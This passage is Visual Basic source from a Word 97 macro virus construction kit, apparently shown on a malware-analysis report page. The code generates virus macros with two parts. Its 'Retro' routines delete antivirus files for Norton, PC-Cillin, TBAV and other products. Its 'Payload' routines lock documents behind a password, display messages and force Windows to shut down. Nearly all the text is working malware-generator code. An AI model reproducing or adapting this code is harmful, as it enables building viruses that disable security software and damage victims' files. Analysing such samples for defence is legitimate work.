Files\Symantec\Symevnt.386""" Print #1, " Kill ""C:\progra~1\symantec\symevnt.386""" End If If frmRetro.chkbPCCillan95 = True Then Print #1, " Kill ""C:\PC-Cillin 95\Scan32.dll""" Print #1, " Kill ""c:\pc-cil~1\.dll""" Print #1, " Kill ""C:\PC-Cillin 95\Lpt$vpn.""" End If If frmRetro.chkbPCCillan97 = True Then Print #1, " Kill ""C:\PC-Cillin 97\Scan32.dll""" Print #1, " Kill ""C:\PC-Cillin 97\Lpt$vpn.""" Print #1, " Kill ""C:\Tsc\PC-Cillin 97\Scan32.dll""" Print #1, " Kill ""c:\tsc\pc-cil~1\.dll""" Print #1, " Kill ""C:\Tsc\PC-Cillin 97\Lpt$vpn.""" End If If frmRetro.chkbTBAV = True Then Print #1, " Kill ""C:\TBAVW95\Tbscan.sig""" Print #1, " Kill ""c:\Tbavw95\Tb.""" Print #1, " Kill ""C:\Tbavw95\Tbavw95.vxd""" End If If frmRetro.chkbCHICO = True Then Print #1, " SetAttr ""c:\Chico\ctr.1"",0" Print #1, " Kill ""c:\Chico\.""" Print #1, " RmDir ""c:\Chico""" End If If frmRetro.chkbEliaShim = True Then Print #1, " Kill ""c:\Vdoc\.*""" Print #1, " RmDir ""c:\Vdoc""" End If If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, "End Sub" Print #1, End If If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, Print #1, "'------------------------------------------------------------" Print #1, "'Payload macro" Print #1, "'Proposta aborrecer o usuário " Print #1, "'------------------------------------------------------------" Print #1, "Sub Payload()" Print #1, " On Error Resume Next" End If If frmPayload.chkbAssistant = True Then Print #1, " Assistant.Visible = True" Print #1, " With Assistant.NewBalloon" Print #1, " .Icon = msoIconAlert" Print #1, " .Text = """ & frmPayloadOfficeAssistant.txtMessage & """" Print #1, " .Heading = """ & frmPayloadOfficeAssistant.txtHeading & """" Print #1, " .Animation = msoAnimationSearching" Print #1, " .Show" Print #1, " End With" Print #1, End If If frmPayload.chkbBeep = True Then Print #1, " For B = 0 To " & frmPayloadBeep.txtNumberOfBeeps Print #1, " Beep" Print #1, " Next" Print #1, End If If frmPayload.chkbCaption = True Then Print #1, " Application.Caption = """ & frmPayloadChangeCaption.txtCaption & """" Print #1, End If If frmPayload.chkbChangeStatusBar = True Then Print #1, " Application.StatusBar = True" Print #1, " StatusBar = """ & frmPayloadChangeStatusBar.txtStatusBar & """" Print #1, End If If frmPayload.chkbMessageBox = True Then Print #1, " MsgBox """ & frmPayloadMessageBox.txtMessageBox & """,vbOKonly,""" & frmPayloadMessageBox.txtMessageBoxTitle & """" Print #1, End If If frmPayload.chkbPassword = True Then Print #1, " ActiveDocument.Password = """ & frmPayloadSetPassword.txtPassword & """" Print #1, " ActiveDocument.Save" Print #1, End If If frmPayload.chkbExitWindows = True Then Print #1, " Tasks.ExitWindows" Print #1, End If If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, "End Sub" End If ByeBye: Close #1 MsgBox "Macro Word97 Kit v1.1, written by Alevirus&RickCrazy", vbOKOnly, "Alevirus98!! Sampaetano" Tasks.ExitWindows End Sub Private Sub lblPayload_Click() End Sub Private Sub lblRetro_Click() End Sub Private Sub lblSourceFileName_Click() End Sub Private Sub lblStealth_Click() End Sub Private Sub lblVirusName_Click() End Sub Private Sub UserForm_Initialize() lblVirusName = VirusName lblSourceFileName = SourceFileName …

Open this report in the interactive analyzer, or submit your own file for analysis.